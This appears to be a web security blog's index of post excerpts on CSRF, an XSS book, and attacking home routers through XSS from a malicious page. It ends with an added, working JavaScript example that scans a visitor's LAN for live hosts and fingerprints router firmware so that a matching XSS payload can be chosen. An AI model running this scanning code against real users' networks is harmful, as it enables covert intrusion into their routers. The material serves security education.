Cross-site File Upload Attacks

As you probably already know, CSRF attacks are only possible when the attacked web application has no additional mechanism to ensure that requests towards it are genuine. To provide one, the web developer must include a unique token with each request, which is validated on the server when the request is received. [...]


XSS Attacks – Cross Site Scripting Exploits and Defence

XSS Attacks – Cross Site Scripting Exploits and Defence is a book project that I was involved in, together with Jeremiah Grossman, Robert "RSnake" Hansen, Anton Rager and, last but not least, Seth Fogie, technical editor and co-author. I must say that the project was a lot of fun mashed with hard work and numerous sleepless nights. [...]


Author of the XSS Book

It is probably about time to announce that I am one of the authors of the upcoming XSS Book that RSnake talked about a month ago on his blog. The complete list of authors is: Seth Fogie, Jeremiah Grossman, Robert Hansen, Anton Rager and Petko Petkov (a.k.a. me).

The book is going quite well and I hope that it will provide a good starting point for those who are interested in getting into client-side web security but don’t know much about it. [...]


XSSing the Lan 4

Trust is a beautiful concept that rarely finds application in real life. Unfortunately, trust is all we've got when dealing with computers: username, password, "master, I am here to serve you"; neither semantics nor pragmatics. The browser security model is, in a sense, based on trust. The browser trusts the websites that you trust. It relies on our judgment, which is wrong most of the time. [...]


XSSing the Lan 3

In my previous posts I mentioned that in order to compromise a LAN device from the Internet, the attacker needs to exploit an XSS vulnerability in the device firmware. The limitations of this kind of attack are quite obvious. Let's have a look at the exploitation process again.

First of all, the local LAN needs to be explored for live hosts, and then each host needs to be scanned with a URL signature database in order to detect the firmware type and version. [...]


XSSing the Lan 2

In order to perform browser-based attacks, JavaScript is most definitely required, with a number of restrictions of course. Flash 7 has the flexibility to perform cross-domain requests without restrictions; however, this is more or less fixed in Flash Player 8. Java applets are much the same in that respect. In certain situations it might be possible to trick the browser into doing whatever you want, but this is a different story. [...]


XSSing the Lan

Since there is a growing interest in XSS (Cross-site Scripting) attacks, I will try to put in theory how border routers/gateways can be trivially compromised over the web. For this, three prerequisites need to be met: a page that is controlled by the attacker, let's call it evil.com; a router vulnerable to XSS; and a user visiting evil.com.

Once the user visits evil.com, malicious JavaScript executes to find which machines are alive on the LAN and where the router is located. [...]
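The two steps described here and in "XSSing the Lan 3" above (find the live hosts on the victim's LAN from JavaScript, then scan each one against a URL signature database to identify the firmware), as an added example that is not code from the original posts. The probe is the classic image-load trick: an `<img>` fires `onload` only when the URL really is an image, fires `onerror` quickly for any other answer or a refused connection, and does nothing until the timeout for a dead address. The probe is injectable so the logic runs offline under Node; the gateway list, the signature database (device names and paths are made up) and the fake LAN are all constructed for the example.

```javascript
// Added example, not code from the original GNUCITIZEN posts. Models the two
// steps the posts describe: LAN host discovery from the browser, then URL
// signature fingerprinting of each live host. Gateway list, signature
// database and fake LAN are constructed for the example.

// Assumption: common default gateway addresses. A real scan would sweep
// whole private ranges (e.g. 192.168.1.1-254).
const GATEWAY_CANDIDATES = [
  'http://192.168.0.1', 'http://192.168.1.1', 'http://192.168.2.1',
  'http://10.0.0.1', 'http://10.1.1.1', 'http://172.16.0.1',
];

// Hypothetical signature database: firmware -> image paths that exist on it.
// Device names and paths are made up; a real database holds fingerprints of
// actual firmware images.
const SIGNATURE_DB = {
  'ExampleRouter FW 1.x': ['/images/logo_er.gif', '/images/status_v1.gif'],
  'ExampleRouter FW 2.x': ['/images/logo_er.gif', '/images/status_v2.gif'],
  'OtherBox v3':          ['/ob/style_bg.png', '/ob/admin_hdr.png'],
};

// Browser probe: 'load' = URL is a real image (path exists), 'error' = host
// answered with something else or refused (host alive), 'timeout' = nothing
// there. Browser-only (Node has no Image), hence the injectable probe below.
function imageProbe(url, timeoutMs = 1500) {
  return new Promise((resolve) => {
    const img = new Image();
    const timer = setTimeout(() => resolve('timeout'), timeoutMs);
    img.onload = () => { clearTimeout(timer); resolve('load'); };
    img.onerror = () => { clearTimeout(timer); resolve('error'); };
    img.src = url;
  });
}

// Step 1: hosts that answered at all before the timeout.
async function discoverLiveHosts(bases, probe) {
  const results = await Promise.all(bases.map((b) => probe(b + '/')));
  return bases.filter((_, i) => results[i] !== 'timeout');
}

// Pure matching step: the firmware whose signature paths all loaded, taking
// the longest (most specific) signature on ties; null if nothing matches.
function matchSignature(loadedPaths, db = SIGNATURE_DB) {
  let best = null;
  for (const [name, paths] of Object.entries(db)) {
    const allLoaded = paths.every((p) => loadedPaths.has(p));
    if (allLoaded && (best === null || paths.length > db[best].length)) best = name;
  }
  return best;
}

// Step 2: probe every path in the database against one host and match.
async function fingerprint(base, probe, db = SIGNATURE_DB) {
  const paths = [...new Set(Object.values(db).flat())];
  const results = await Promise.all(paths.map((p) => probe(base + p)));
  const loaded = new Set(paths.filter((_, i) => results[i] === 'load'));
  return matchSignature(loaded, db);
}

// Whole flow: [{ host, firmware }] for each live host (firmware null if unknown).
async function scanLan(probe, bases = GATEWAY_CANDIDATES, db = SIGNATURE_DB) {
  const live = await discoverLiveHosts(bases, probe);
  return Promise.all(live.map(async (host) => ({ host, firmware: await fingerprint(host, probe, db) })));
}

// Offline stand-in for imageProbe: a constructed LAN with one router at
// 192.168.1.1 running "ExampleRouter FW 2.x" and nothing else answering.
function fakeProbe(url) {
  const router = 'http://192.168.1.1';
  if (!url.startsWith(router)) return Promise.resolve('timeout');
  const path = url.slice(router.length);
  const exists = SIGNATURE_DB['ExampleRouter FW 2.x'].includes(path);
  return Promise.resolve(exists ? 'load' : 'error');
}

scanLan(fakeProbe).then((r) => console.log(JSON.stringify(r)));
// prints [{"host":"http://192.168.1.1","firmware":"ExampleRouter FW 2.x"}]
```

In a real page `scanLan(imageProbe)` replaces the fake probe, and the firmware name selects which XSS payload to send to the router in the next step. Two caveats a practitioner will want: the liveness signal is a timing heuristic (a slow host looks dead, a fast 404 looks alive), and current browsers increasingly block such public-to-private-network requests (Chrome's Private Network Access work), so the technique as the 2006 posts describe it no longer works everywhere.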
